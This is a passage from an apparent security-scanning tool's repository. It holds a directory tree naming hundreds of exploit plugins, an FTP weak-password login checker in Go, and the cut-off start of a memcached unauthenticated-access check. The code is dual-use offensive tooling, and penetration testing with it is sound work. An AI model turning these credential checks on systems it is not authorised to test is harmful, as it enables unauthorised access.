├── .idea ├── .gitignore ├── misc.xml ├── modules.xml ├── prismx_cli.iml └── vcs.xml ├── LICENSE ├── README.md ├── README_CN.md ├── core ├── aliveCheck │ ├── host.go │ └── port.go ├── hydra │ ├── check.go │ ├── ftp.go │ ├── memcached.go │ ├── mongodb.go │ ├── mssql.go │ ├── mysql.go │ ├── oracle.go │ ├── postgres.go │ ├── rdp.go │ ├── redis.go │ ├── smb.go │ ├── snmp.go │ ├── ssh.go │ ├── telnet.go │ ├── vnc.go │ ├── winrm.go │ └── zookeeper.go ├── jsFind │ ├── find.go │ └── rules.yaml ├── models │ ├── params.go │ └── plugin.go ├── owaspTop10 │ ├── Core.go │ ├── fileIncloud │ │ └── start.go │ ├── sqli │ │ ├── data │ │ │ └── errors.xml │ │ └── start.go │ ├── utils │ │ └── utils.go │ └── xss │ │ └── start.go ├── plugins │ ├── exploits │ │ ├── 360_TianQing_ccid_SQL_injectable.yaml │ │ ├── 360_Tianqing_database_information_disclosure.yaml │ │ ├── 74cms_5.0.1_前台SQL注入.yaml │ │ ├── ACTI_Camera_images_File_read.yaml │ │ ├── Active_UC_index.action_远程命令执行漏洞.yaml │ │ ├── Adslr_Enterprise_online_behavior_management_system_Information_leakage.yaml │ │ ├── Alibaba_Canal_Default_Password.yaml │ │ ├── Alibaba_Canal_Info_Leak.yaml │ │ ├── Alibaba_Nacos_控制台默认弱口令.yaml │ │ ├── Apach_Solr_File_Read.yaml │ │ ├── Apache Kylin Console 控制台弱口令.yaml │ │ ├── Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937).yaml │ │ ├── Apache_ActiveMQ默认密码.yaml │ │ ├── Apache_Active_MQ_RCE.go │ │ ├── Apache_Cocoon_Xml_注入_CVE-2020-11991.yaml │ │ ├── Apache_Flink_Upload_RCE.yaml │ │ ├── Apache_HTTP_Server_路径穿越漏洞.yaml │ │ ├── Apache_Kylin的未授权配置泄露漏洞.yaml │ │ ├── Apache_Ofbiz_CVE-2018-8033-XXE.yaml │ │ ├── Apache_Ofbiz_XMLRPC_RCE漏洞CVE-2020-9496.yaml │ │ ├── Apache_RocketMQ_RCE CVE-2023-33246.go │ │ ├── Apache目录穿越漏洞_CVE-2021-41773.yaml │ │ ├── Aspcms_backend_leak.yaml │ │ ├── Atlassian Jira 信息泄露漏洞 CVE-2020-14181.yaml │ │ ├── Atlassian_Confluence_信息泄露漏洞.yaml │ │ ├── CVE-2018-1000110 用户枚举.yaml │ │ ├── CVE-2018-1000861 Jenkins远程代码执行.yaml │ │ ├── CVE-2019-1003000 Jenkins远程代码执行.yaml │ │ ├── 
CVE-2021-22205_GitLab_未授权RCE.yaml │ │ ├── CVE-2021-41277_Metabase_任意文件读取.yaml │ │ ├── CVE-2023-25157-GeoServer SQL 注入漏洞.go │ │ ├── Cacti_Weathermap_File_Write.yaml │ │ ├── China_Mobile_Yu_routed_the_login_bypass.yaml │ │ ├── Cisco_CVE-2020-3452_Read_File.yaml │ │ ├── Citrix_CVE-2020-8193_Unauthorized.yaml │ │ ├── Citrix_Cve-2020-8191-XSS.yaml │ │ ├── ClusterEngineV4.0 RCE (CVE-2020-21224).yaml │ │ ├── ClusterEngine_V4_0_Shell_cluster_RCE.yaml │ │ ├── Confluence_未授权_RCE_CVE-2019-3396.yaml │ │ ├── Coremail邮件系统配置文件信息泄露.yaml │ │ ├── D-Link AC集中管理系统默认弱口令.yaml │ │ ├── DLink_CVE-2020-25078_Account_Disclosure.yaml │ │ ├── Docker_Api_Unauthorized_Rce.yaml │ │ ├── Docker_Registry_Api_Unauth.yaml │ │ ├── Druid_Monitor_Unauth.yaml │ │ ├── Drupal_CVE-2014-3704-sqli.yaml │ │ ├── Drupal_CVE-2018-7600_RCE.yaml │ │ ├── Ecshop_CNVD-2020-58823-SQLI.yaml │ │ ├── ElasticSearch_api_未授权访问.yaml │ │ ├── Exchange_CVE-2021-26855-SSRF.yaml │ │ ├── F5_BIG-IP代码执行漏(CVE-2021-22986).yaml │ │ ├── F5_Tmui_CVE-2020-5902_RCE.yaml │ │ ├── FineReport v8.0 Arbitrary file read.yaml │ │ ├── FineReport(帆软)报表系统目录遍历漏洞.yaml │ │ ├── Finetree-5MP-摄像机 默认口令 未授权任意用户添加.yaml │ │ ├── Gitlab_CNVD-2021-14193_InfoLeak.yaml │ │ ├── Grafana未授权任意文件读取漏洞.go │ │ ├── HIBOS酒店宽带运营系统存在命令执行漏洞.yaml │ │ ├── HIKVISION 视频编码设备接入网关 任意文件下载.yaml │ │ ├── HanWang Time Attendance SQL injection.yaml │ │ ├── Hikvision_iVMS_resourceOperations接口文件上传.go │ │ ├── JBoss-CVE-2017-12149.yaml │ │ ├── Jenkins未授权访问.yaml │ │ ├── JingHe OA C6 Default password.yaml │ │ ├── JingHe OA download.asp File read.yaml │ │ ├── Joomla_contushdvideoshare_任意文件读取漏洞.yaml │ │ ├── Joomla_departments_SQL注入.yaml │ │ ├── Kingdee EAS server_file Directory traversal.yaml │ │ ├── Kingsoft V8 Default weak password.yaml │ │ ├── Kyan 网络监控设备 run.php 远程命令执行漏洞.yaml │ │ ├── Kyan网络监控设备账号密码泄露漏洞.yaml │ │ ├── LanhaiZuoyue system debug.php RCE.yaml │ │ ├── LanhaiZuoyue system download.php File read.yaml │ │ ├── Lanproxy 目录遍历漏洞 CVE-2021-3019.yaml │ │ ├── MS17010.go │ │ ├── MessageSolution 
邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.yaml │ │ ├── Meta_CRM5客户关系管理系统文件上传漏洞.yaml │ │ ├── Portainer为创建用户导致未授权访问(CVE-2018-19367).yaml │ │ ├── Ruijie smartweb password information disclosure.yaml │ │ ├── Ruijie smartweb weak password.yaml │ │ ├── RuoYi Druid Unauthorized access.yaml │ │ ├── SDWAN智能网关应用系统弱口令.yaml │ │ ├── Samsung WLAN AP WEA453e RCE.yaml │ │ ├── Seeyon OA A6 DownExcelBeanServlet User information leakage.yaml │ │ ├── Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information.yaml │ │ ├── Seeyon OA A6 initDataAssess.jsp User information leakage.yaml │ │ ├── Seeyon OA A6 setextno.jsp SQL injection.yaml │ │ ├── Seeyon OA A8-m Information leakage.yaml │ │ ├── Selea OCR-ANPR get_file.php File read.yaml │ │ ├── Shiro_RCE_CVE_2016_4437.go │ │ ├── ShopXO download File read (CNVD-2021-15822).yaml │ │ ├── ShowDoc_任意文件上传漏洞.yaml │ │ ├── SmbGhost_Vulnerable_CVE-2020-0796.go │ │ ├── SonicWall SSL-VPN 远程命令执行漏洞.yaml │ │ ├── Spring_Cloud_Gateway_CVE_2022_22947.yaml │ │ ├── Springboot RCE CVE-2022-22965.yaml │ │ ├── Swagger UI document leaked.go │ │ ├── TamronOS IPTV系统后台任意文件下载.yaml │ │ ├── Tomcat_AJP任意文件读取漏洞_CVE-2020-1938.go │ │ ├── Tomcat_manager_WeakPassword.go │ │ ├── Tomcat代码执行漏洞(CVE-2017-12615).yaml │ │ ├── VMWare Operations vRealize Operations Manager API SSRF CVE-2021-21975.yaml │ │ ├── VMware_vCenter远程代码执行漏洞.yaml │ │ ├── WangKang NS-ASG cert_download.php File read.yaml │ │ ├── Weaver OA 8 SQL injection.yaml │ │ ├── Weaver_e_cology_OA_XStream_Remote_Code_Execution.yaml │ │ ├── Weblogic LDAP RCE CVE-2021-2109.yaml │ │ ├── Weblogic SSRF漏洞 CVE-2014-4210.yaml │ │ ├── XXL-JOB Default password.yaml │ │ ├── Xieda-oa文件读取路段.yaml │ │ ├── Yinpeng Hanming Video Conferencing Arbitrary file read (CNVD-2020-62437).yaml │ │ ├── Zabbix登录绕过漏洞(CVE-2022-23131).yaml │ │ ├── _通天星_cmsv6_车载视频监控平台_disable_存在_sql_注入漏洞.yaml │ │ ├── activemq_远程代码执行漏洞_(cve-2016-3088).yaml │ │ ├── adselfservice_plus_rce_cve-2021-40539.yaml │ │ ├── apache_airflow_unauthorized.yaml │ │ ├── 
apache_apisix_dashboard_rce_cve-2021-45232.yaml │ │ ├── apache_druid_abritrary_file_read_cve-2021-36749.yaml │ │ ├── apache_http_server_arbitrary_file_read(cve-2021-41773).yaml │ │ ├── citrix-cve-2019-19781-path-traversal.yaml │ │ ├── citrix-xenmobile-cve-2020-8209.yaml │ │ ├── cnvd-2021-49104.yaml │ │ ├── coldfusion-cve-2010-2861-lfi.yaml │ │ ├── confluence-cve-2021-26084.yaml │ │ ├── confluence_远程代码执行漏洞-cve-2023-22527.yaml │ │ ├── consul-rexec-rce.yaml │ │ ├── consul-service-rce.yaml │ │ ├── couchcms-cve-2018-7662.yaml │ │ ├── couchdb-cve-2017-12635_垂直越权漏洞.yaml │ │ ├── couchdb-unauth.yaml │ │ ├── craftcms-seomatic-cve-2020-9757-rce.yaml │ │ ├── cve-2017-10271_weblogic_xmldecoder反序列化漏洞.yaml │ │ ├── cve-2021-3129-laravel_debug_mod_rce.yaml │ │ ├── cve-2021-3223_node-red_任意文件读取.yaml │ │ ├── cve-2022-22965:spring_framework远程代码执行漏洞.yaml │ │ ├── cve-2023-22505_账户权限提升漏洞.yaml │ │ ├── cve-2023-28432_minio信息泄露.yaml │ │ ├── cve-2023-6895-海康威视对讲广播系统远程命令执行漏洞.yaml │ │ ├── cve-2024-36401-geoserver远程代码执行漏洞.yaml │ │ ├── dlink-cve-2020-9376-dump-credentials.yaml │ │ ├── ecologyoa_clusterupgrade_-_upload.yaml │ │ ├── ezOffice_万户OA文件上传.yaml │ │ ├── ezoffice-oa-officeserver_jsp文件上传漏洞.yaml │ │ ├── fahuo100_sql_injection_CNVD_2021_30193.yaml │ │ ├── fastJson.go │ │ ├── hikvision_isecure_center综合安防管理平台存在文件上传漏洞.yaml │ │ ├── hikvision_rce_cve-2021-36260.yaml │ │ ├── hikvision_report接口任意文件上传漏洞.yaml │ │ ├── jeecg-boot系统接口jmlink权限绕过漏洞.yaml │ │ ├── jeecgboot_testconnection_ssti模板注入远程命令执行漏洞.yaml │ │ ├── jeecg任意文件上传漏洞.yaml │ │ ├── jmx-console控制台未授权访问漏洞.yaml │ │ ├── journyx项目管理软件_soap_cgi_pyc_xxe漏洞.yaml │ │ ├── kingdeeerp-unserialize-rce.yaml │ │ ├── kkfileview_任意文件读取.yaml │ │ ├── landray-OA-Arbitrary-file-read.yaml │ │ ├── log4j2_RCE_CVE-2021-44228.go │ │ ├── nacos未授权访问漏洞-cve-2021-29441.yaml │ │ ├── phpmyadmin_反序列化漏洞.yaml │ │ ├── phpunit CVE_2017_9841 远程代码执行.yaml │ │ ├── qvd-2023-13615畅捷通t_远程代码执行漏洞.yaml │ │ ├── seeyon常见后门.yaml │ │ ├── servicenow_ui_jelly模板注入(cve-2024-4879).yaml │ │ ├── 
spring_cloud_gateway_远程代码执行漏洞(cve-2022-22947).yaml │ │ ├── synway-网关管理软件debug_php远程代码执行漏洞.yaml │ │ ├── wanhu_oa_smartupload_jsp_-_arbitrary_file_upload.yaml │ │ ├── weaver_e-cology_beanshell_-_remote_command_execution.yaml │ │ ├── weaver_e-office_v9_5_-_arbitrary_file_upload.yaml │ │ ├── weblogic_任意文件上传漏洞.yaml │ │ ├── weblogic任意文件上传漏洞(cve-2018-2894).yaml │ │ ├── wih.go │ │ ├── yapi_rce.yaml │ │ ├── zabbix_默认账户漏洞.yaml │ │ ├── 万户协同办公平台未授权访问漏洞.yaml │ │ ├── 世邦ip网络对讲广播系统登录绕过.yaml │ │ ├── 中国移动 禹路由 敏感信息泄露漏洞.yaml │ │ ├── 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露.yaml │ │ ├── 主动安全监控云平台存在任意文件读取漏洞.yaml │ │ ├── 亿邮电子邮件系统远程命令执行.yaml │ │ ├── 华天动力协同oa任意文件上传漏洞.yaml │ │ ├── 友_grp-u8_uploadfiledata-任意文件上传漏洞.yaml │ │ ├── 大华DSS系统 任意文件下载漏洞.yaml │ │ ├── 大华dss账号密码泄露.yaml │ │ ├── 大华智慧园区_前台_poi_文件上传.yaml │ │ ├── 大华智慧园区综合管理平台.yaml │ │ ├── 大华智慧园区综合管理平台_user_getuserinfobyusername_action_账号密码泄漏漏洞.yaml │ │ ├── 大华智慧园区综合管理平台publishing任意文件上传漏洞.yaml │ │ ├── 大华智慧园区综合管理平台任意密码读取漏洞.yaml │ │ ├── 大华智慧园区综合管理平台文件上传漏洞(cve-2023-3836).yaml │ │ ├── 大华智能物联综合管理平台justfortest用户登录漏洞.yaml │ │ ├── 天融信上网行为管理系统系统某接口_rce.yaml │ │ ├── 奇安信_vpn_未授权管理用户遍历及任意账号密码修改.yaml │ │ ├── 契约锁电子签章平台_add_远程命令执行漏洞.yaml │ │ ├── 安恒明御安全网关命令执行漏洞.yaml │ │ ├── 宝塔_7.42版本_pma未授权漏洞.yaml │ │ ├── 户oa_filetest文件上传.yaml │ │ ├── 明御安全网关存在任意文件读取漏洞.yaml │ │ ├── 极通EWEBSphpinfo泄露.yaml │ │ ├── 极通EWEBS任意文件读取.yaml │ │ ├── 泛微_e-cology_ktreeuploadaction_任意文件上传漏洞.yaml │ │ ├── 泛微_e-office_10_officeserver_任意文件上传漏洞.yaml │ │ ├── 泛微e-cology9_sql注入-cnvd-2023-12632.yaml │ │ ├── 泛微e-mobile_命令执行漏洞.yaml │ │ ├── 泛微e-mobile命令执行漏洞.yaml │ │ ├── 泛微oa_e-office平台uploadify_php任意文件上传漏洞.yaml │ │ ├── 泛微oa_fileupload任意文件上传漏洞.yaml │ │ ├── 泛微oa存在未授权任意文件上传漏洞_攻击者可直接上传任意文件_进而控制服务器_.yaml │ │ ├── 泛微移动管理平台e-mobile_lang2sql接口存在任意文件上传.yaml │ │ ├── 海康威视_综合安防管理平台_keepalive接口_远程代码执行漏洞.yaml │ │ ├── 海康威视综合安防管理平台_前台rce.yaml │ │ ├── 海康威视综合安防管理平台信息泄露漏洞.yaml │ │ ├── 深信服 行为感知系统 c.php 远程命令执行漏洞.yaml │ │ ├── 瑞斯康达-多业务智能网关-rce.yaml │ │ ├── 用友-nc-cloud-blobrefclasssea反序列化.yaml │ │ ├── 用友-时空ksoa_imageupload_任意文件上传漏洞.yaml 
│ │ ├── 用友NC_BeanShell远程代码执行漏洞.yaml │ │ ├── 用友_U8_OA_test.jsp文件_SQL注入.yaml │ │ ├── 用友_nc_cloud_jsinvoke_任意文件上传.yaml │ │ ├── 用友_nc_cloud_uploadchunk_任意文件上传.yaml │ │ ├── 用友_nc_uploadcontrol_uploadfile_任意文件上传漏洞.yaml │ │ ├── 用友_u8_crm客户关系管理系统_getemaildata_php_任意文件上传漏洞复现.yaml │ │ ├── 用友grp-u8_bx_historydatacheck_sql注入漏洞.yaml │ │ ├── 用友grp-u8_u8appproxy任意文件上传漏洞.yaml │ │ ├── 用友nc6_5反序列化文件上传漏洞.yaml │ │ ├── 用友nc_accept_jsp任意文件上传漏洞.yaml │ │ ├── 用友nc_mp模块文件上传漏洞分析.yaml │ │ ├── 用友nc_uapim接口处存在任意文件上传漏洞.yaml │ │ ├── 用友u8_crm_swfupload_任意文件上传漏洞复现(xve-2024-8597).yaml │ │ ├── 用友u8_uploadfiledata任意文件上传.yaml │ │ ├── 用友u8c_fileservlet_任意文件读取漏洞.yaml │ │ ├── 用友u8c文件上传漏洞.yaml │ │ ├── 用友时空ksoa_attachment_文件上传漏洞.yaml │ │ ├── 用友致远u8-oa_getsessionlist_jsp信息泄露.yaml │ │ ├── 畅捷通t__sql注入漏洞(qvd-2023-13612).yaml │ │ ├── 网康下一代防火墙RCE.yaml │ │ ├── 网神secgate_3600防火墙文件上传.yaml │ │ ├── 致远OA webmail.do任意文件下载 CNVD-2020-62422.yaml │ │ ├── 致远a8任意文件写入漏洞(cnvd-2019-19299).yaml │ │ ├── 致远m1_usertokenservice_反序列化rce漏洞.yaml │ │ ├── 致远oa_a6_存在数据库敏感信息泄露.yaml │ │ ├── 致远oa_ajax_do未授权上传(cnvd_2021_01627).yaml │ │ ├── 致远互联analyticscloud_分析云_任意文件读取.yaml │ │ ├── 致远伪0day-fastjson.yaml │ │ ├── 致远报表密码泄露.yaml │ │ ├── 蓝凌_oa_金格组件任意文件上传漏洞.yaml │ │ ├── 蓝凌oa_custom_jsp_任意文件读取漏洞.yaml │ │ ├── 蓝凌oa_sysuicomponent_任意文件上传漏洞.yaml │ │ ├── 蓝凌oa_treexml_tmpl_远程命令执行漏洞.yaml │ │ ├── 蓝凌oa_文件copy导致远程代码执行.yaml │ │ ├── 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.yaml │ │ ├── 通达oa_ispirit存在后台任意文件上传漏洞.yaml │ │ ├── 通达oa_v2017_action_upload任意文件上传漏洞.yaml │ │ ├── 通达oa未授权访问.yaml │ │ ├── 金和editeprint_aspx文件上传漏洞.yaml │ │ ├── 金和oa_jc6_ntko-upload_任意文件上传漏洞复现.yaml │ │ ├── 金和oa_jc6任意文件上传.yaml │ │ ├── 金山 V8终端安全系统任意文件下载漏洞.yaml │ │ ├── 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞.yaml │ │ └── 锐捷RG-UAC 账户硬编码漏洞.yaml │ └── initialize.go ├── subdomain │ ├── passive │ │ ├── passive.go │ │ └── sources.go │ ├── runner │ │ └── runner.go │ └── subscraping │ │ ├── agent.go │ │ ├── sources │ │ ├── alienvault │ │ │ └── alienvault.go │ │ ├── anubis │ │ │ └── anubis.go │ │ ├── archiveis │ │ │ └── 
archiveis.go │ │ ├── commoncrawl │ │ │ └── commoncrawl.go │ │ ├── crtsh │ │ │ └── crtsh.go │ │ ├── dnsdumpster │ │ │ └── dnsdumpster.go │ │ ├── fofa │ │ │ └── fofa.go │ │ ├── fullhunt │ │ │ └── fullhunt.go │ │ ├── hackertarget │ │ │ └── hackertarget.go │ │ ├── hunter │ │ │ └── hunter.go │ │ ├── rapiddns │ │ │ └── rapiddns.go │ │ ├── riddler │ │ │ └── riddler.go │ │ ├── shodan │ │ │ └── shodan.go │ │ ├── sitedossier │ │ │ └── sitedossier.go │ │ ├── sonarsearch │ │ │ └── sonarsearch.go │ │ ├── sublist3r │ │ │ └── subllist3r.go │ │ ├── threatbook │ │ │ └── threatbook.go │ │ ├── threatcrowd │ │ │ └── threatcrowd.go │ │ ├── threatminer │ │ │ └── threatminer.go │ │ ├── virustotal │ │ │ └── virustotal.go │ │ ├── waybackarchive │ │ │ └── waybackarchive.go │ │ └── zoomeye │ │ │ └── zoomeye.go │ │ └── types.go └── vulnerability │ ├── app.go │ └── verify.go ├── go.mod ├── go.sum ├── images ├── img.png ├── scan.png ├── wx.jpg └── wx_qrcode.jpg ├── main.go ├── prismx_cli.iml ├── scan ├── func.go └── task.go └── utils ├── arr └── utils.go ├── cryptoPlus ├── aes.go ├── base64.go ├── bcrypt.go ├── encoding.go ├── md5.go ├── rsa.go ├── sha256.go └── tls.go ├── file └── local.go ├── font └── fontColor.go ├── global.go ├── go-ora ├── advanced_nego │ ├── advanced_nego.go │ ├── auth_service.go │ ├── comm.go │ ├── data_integrity_service.go │ ├── default_service.go │ ├── encrypt_service.go │ ├── ntlmssp │ │ ├── authenticate_message.go │ │ ├── authheader.go │ │ ├── avids.go │ │ ├── challenge_message.go │ │ ├── messageheader.go │ │ ├── negotiate_flags.go │ │ ├── negotiate_message.go │ │ ├── nlmp.go │ │ ├── unicode.go │ │ ├── varfield.go │ │ └── version.go │ ├── nts.go │ └── supervisor_service.go ├── auth_object.go ├── bfile.go ├── bulk_copy.go ├── command.go ├── connection.go ├── connection_string.go ├── converters │ ├── generatefloat │ │ └── main.go │ ├── max_len.go │ ├── oracle_number.go │ ├── oracle_number_test.go │ ├── other_types.go │ ├── other_types_test.go │ ├── string_conversion.go 
│ ├── string_conversion_new.go │ ├── testfloatsvalues.go │ ├── type_conversion.go │ └── type_conversion_test.go ├── custom_types.go ├── data_set.go ├── data_type_nego.go ├── db_version.go ├── driver.go ├── lob.go ├── network │ ├── accept_packet.go │ ├── address_resolution.go │ ├── connect_option.go │ ├── connect_option_test.go │ ├── connect_packet.go │ ├── data_packet.go │ ├── marker_packet.go │ ├── net_others.go │ ├── net_windows.go │ ├── oracle_error.go │ ├── packets.go │ ├── redirect_packet.go │ ├── refuse_packet.go │ ├── security │ │ ├── des_cryptor.go │ │ ├── general.go │ │ ├── md4 │ │ │ ├── md4.go │ │ │ └── md4block.go │ │ └── rc4_cryptor.go │ ├── session.go │ ├── session_ctx.go │ └── summary_object.go ├── oracletype_string.go ├── parameter.go ├── parameter_decode_array.go ├── parameter_encode.go ├── parameter_encode_array.go ├── ref_cursor.go ├── rowid.go ├── simple_object.go ├── tcp_protocol_nego.go ├── timestamp.go ├── timestampTZ.go ├── trace │ ├── trace.go │ └── trace.go-e ├── transaction.go ├── udt.go ├── urowid.go ├── utils.go ├── wallet.go ├── wallet_algo.go └── wallet_utils.go ├── go-rdp ├── core │ ├── io.go │ ├── rle.go │ ├── socket.go │ ├── types.go │ └── util.go ├── emission │ └── emitter.go └── protocol │ ├── lic │ └── lic.go │ ├── nla │ ├── cssp.go │ ├── encode.go │ └── ntlm.go │ ├── pdu │ ├── caps.go │ ├── cliprdr.go │ ├── data.go │ └── pdu.go │ ├── rfb │ └── rfb.go │ ├── sec │ └── sec.go │ ├── t125 │ ├── ber │ │ └── ber.go │ ├── gcc │ │ └── gcc.go │ ├── mcs.go │ └── per │ │ └── per.go │ ├── tpkt │ └── tpkt.go │ └── x224 │ └── x224.go ├── go-snmp ├── decode.go ├── gosnmp.go ├── helper.go └── packet.go ├── go-telnet └── telnet.go ├── go-vnc ├── go │ └── metrics │ │ └── metrics.go ├── handshake.go ├── security.go └── vncclient.go ├── httpResult └── return.go ├── interactsh └── pkg │ ├── client │ └── client.go │ ├── options │ └── session-info.go │ ├── server │ ├── http_server.go │ ├── server.go │ └── util.go │ └── storage │ ├── error.go │ ├── 
storage.go │ └── types.go ├── logger ├── color │ └── color.go └── log.go ├── netUtils ├── body.go ├── scraper.go └── tcp.go ├── parse ├── ParseIP.go └── parsePort.go ├── proxyPool └── pool.go ├── putils ├── async │ ├── async.go │ └── async_test.go ├── batcher │ ├── batcher.go │ ├── batcher_test.go │ └── doc.go ├── buffer │ └── disk.go ├── channelutil │ ├── README.md │ ├── clone.go │ ├── clone_join_test.go │ ├── join.go │ └── utils.go ├── conn │ └── connpool │ │ ├── inflight.go │ │ └── onetimepool.go ├── consts │ └── errors.go ├── context │ ├── NContext.go │ ├── Ncontext_test.go │ ├── context.go │ └── context_test.go ├── conversion │ ├── conversion.go │ └── conversion_test.go ├── crypto │ ├── README.md │ ├── hash.go │ ├── hash_test.go │ ├── jarm │ │ └── jarm.go │ ├── tls.go │ └── ztls.go ├── dedupe │ ├── dedupe.go │ ├── dedupe_test.go │ ├── leveldb.go │ └── map.go ├── env │ └── env.go ├── errors │ ├── enriched.go │ ├── err_with_fmt.go │ ├── errinterface.go │ ├── errlevel.go │ └── errors.go ├── exec │ ├── README.md │ ├── executil.go │ └── executil_test.go ├── file │ ├── README.md │ ├── clean.go │ ├── clean_test.go │ ├── file.go │ ├── file_test.go │ └── tests │ │ ├── empty_lines.txt │ │ ├── path-traversal.txt │ │ ├── pipe_separator.txt │ │ └── standard.txt ├── folder │ ├── README.md │ ├── folderutil.go │ ├── folderutil_linux_test.go │ ├── folderutil_test.go │ ├── folderutil_win_test.go │ └── std_dirs.go ├── generic │ ├── generic.go │ ├── generic_test.go │ ├── lockable.go │ └── lockable_test.go ├── healthcheck │ ├── connection.go │ ├── connection_test.go │ ├── dns.go │ ├── dns_test.go │ ├── environment.go │ ├── environment_test.go │ ├── healthcheck.go │ ├── path_permission.go │ └── path_permission_test.go ├── http │ ├── README.md │ ├── chain.go │ ├── httputil.go │ ├── httputil_test.go │ ├── internal.go │ ├── normalization.go │ ├── respChain.go │ └── response.go ├── ip │ ├── README.md │ ├── iputil.go │ └── iputil_test.go ├── maps │ ├── README.md │ ├── generic_map.go │ 
├── mapsutil.go │ ├── ordered_map.go │ └── synclock_map.go ├── memguardian │ ├── README.MD │ ├── doc.go │ ├── memguardian.go │ ├── memory.go │ ├── memory_linux.go │ └── memory_others.go ├── ml │ ├── metrics │ │ ├── classification_report.go │ │ └── confusion_matrix.go │ ├── model_selection │ │ └── model_selection.go │ ├── naive_bayes │ │ ├── naive_bayes_classifier.go │ │ └── naive_bayes_classifier_test.go │ └── types.go ├── net │ ├── net.go │ └── net_test.go ├── os │ ├── arch.go │ └── os.go ├── patterns │ ├── doc.go │ ├── patterns.go │ └── patterns_test.go ├── permission │ ├── README.md │ ├── error.go │ ├── permission.go │ ├── permission_file.go │ ├── permission_file_test.go │ ├── permission_linux.go │ ├── permission_other.go │ ├── permission_test.go │ └── permission_win.go ├── ports │ ├── ports.go │ └── ports_test.go ├── pprof │ ├── README.md │ └── pprof.go ├── process │ ├── docker.go │ └── process.go ├── proxy │ ├── README.md │ ├── burp.go │ ├── proxy.go │ └── proxy_test.go ├── ptr │ ├── ptr.go │ └── ptr_test.go ├── race │ ├── README.md │ ├── norace.go │ └── race.go ├── rand │ ├── number.go │ └── number_test.go ├── reader │ ├── conn_read.go │ ├── conn_read_test.go │ ├── error.go │ ├── examples │ │ └── keypress │ │ │ ├── buffered │ │ │ └── keypress.go │ │ │ └── raw │ │ │ └── keypress.go │ ├── frozen_reader.go │ ├── frozen_reader_test.go │ ├── rawmode │ │ ├── raw_mode.go │ │ ├── raw_mode_posix.go │ │ ├── raw_mode_windows.go │ │ ├── values_darwin.go │ │ └── values_linux.go │ ├── reader_keypress.go │ ├── reusable_read_closer.go │ ├── reusable_read_closer_test.go │ ├── timeout_reader.go │ └── timeout_reader_test.go ├── reflect │ ├── README.md │ ├── reflectutil.go │ ├── reflectutil_test.go │ └── tests │ │ └── tests.go ├── routing │ ├── router.go │ ├── router_darwin.go │ ├── router_linux.go │ └── router_windows.go ├── scripts │ ├── README.md │ └── versionbump │ │ ├── versionbump.go │ │ └── versionbump_test.go ├── slice │ ├── README.md │ ├── sliceutil.go │ └── 
sliceutil_test.go ├── strings │ ├── README.md │ ├── strings_encoding.go │ ├── strings_normalize.go │ ├── stringsutil.go │ └── stringsutil_test.go ├── structs │ └── structs.go ├── sync │ ├── adaptivewaitgroup.go │ ├── semaphore │ │ └── semaphore.go │ └── sizedpool │ │ ├── sizedpool.go │ │ └── sizedpool_test.go ├── syscallutil │ ├── syscall_unix.go │ ├── syscall_unix_others.go │ ├── syscallutil.go │ ├── syscallutil_test.go │ └── syscallutil_win.go ├── time │ ├── README.md │ ├── timeutil.go │ └── timeutil_test.go ├── trace │ ├── trace.go │ └── trace_test.go ├── update │ ├── types.go │ ├── update.go │ ├── utils_all.go │ └── utils_linux.go └── url │ ├── README.md │ ├── merge_test.go │ ├── orderedparams.go │ ├── orderedparams_test.go │ ├── parsers.go │ ├── rawparam.go │ ├── rawparam_test.go │ ├── url.go │ ├── url_test.go │ └── utils.go ├── randomUtils ├── codec.go ├── generator.go ├── rand.go └── uuid.go ├── reverse └── server.go ├── task └── pool.go └── temp └── cel.go /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/prismx_cli.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- 
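/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | 6 |

--------------------------------------------------------------------------------
/core/hydra/ftp.go:
--------------------------------------------------------------------------------
package hydra

import (
	"github.com/jlaffaye/ftp"
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
)

// FtpWeakPass checks whether the FTP service at the task's target accepts the
// task's username/password pair.
//
// res must hold a models.HydraTask; any other dynamic type panics on the type
// assertion. It returns a models.MSG describing the finding when the login
// succeeds and nil when the connection or the login fails, so a network error
// and a rejected credential are indistinguishable to the caller. The returned
// payload carries the accepted password in clear text.
func FtpWeakPass(res any) any {
	t := res.(models.HydraTask)

	// Dial through the project's helper so the configured timeout applies. The
	// address handed over by the library is ignored in favour of t.Target.
	dial := func(network, address string) (net.Conn, error) {
		return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
	}
	conn, err := ftp.Dial(t.Target, ftp.DialWithDialFunc(dial))
	if err != nil {
		return nil
	}
	// Quit on every path. Previously a failed Login returned without closing
	// the control connection, and the success path only logged out.
	defer conn.Quit()

	if err = conn.Login(t.Dict.User, t.Dict.Password); err != nil {
		return nil
	}
	return models.MSG{
		Name: "FTP WeakPassword",
		Type: "WeakPassword",
		Payload: models.Dict{
			User:     t.Dict.User,
			Password: t.Dict.Password,
		},
		Target: t.Target,
	}
}


--------------------------------------------------------------------------------
/core/hydra/memcached.go:
--------------------------------------------------------------------------------
package hydra

import (
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
	"strings"
	"time"
)

// MemcachedWeakPass checks whether the memcached service at the task's target
// answers a "stats" command without authentication. Despite the name, no
// credentials from the task are used.
//
// res must hold a models.HydraTask. It returns a models.MSG of type
// "Unauthorized" when the reply contains "STAT", and nil on any error or on
// any other reply.
func MemcachedWeakPass(res any) any {
	t := res.(models.HydraTask)
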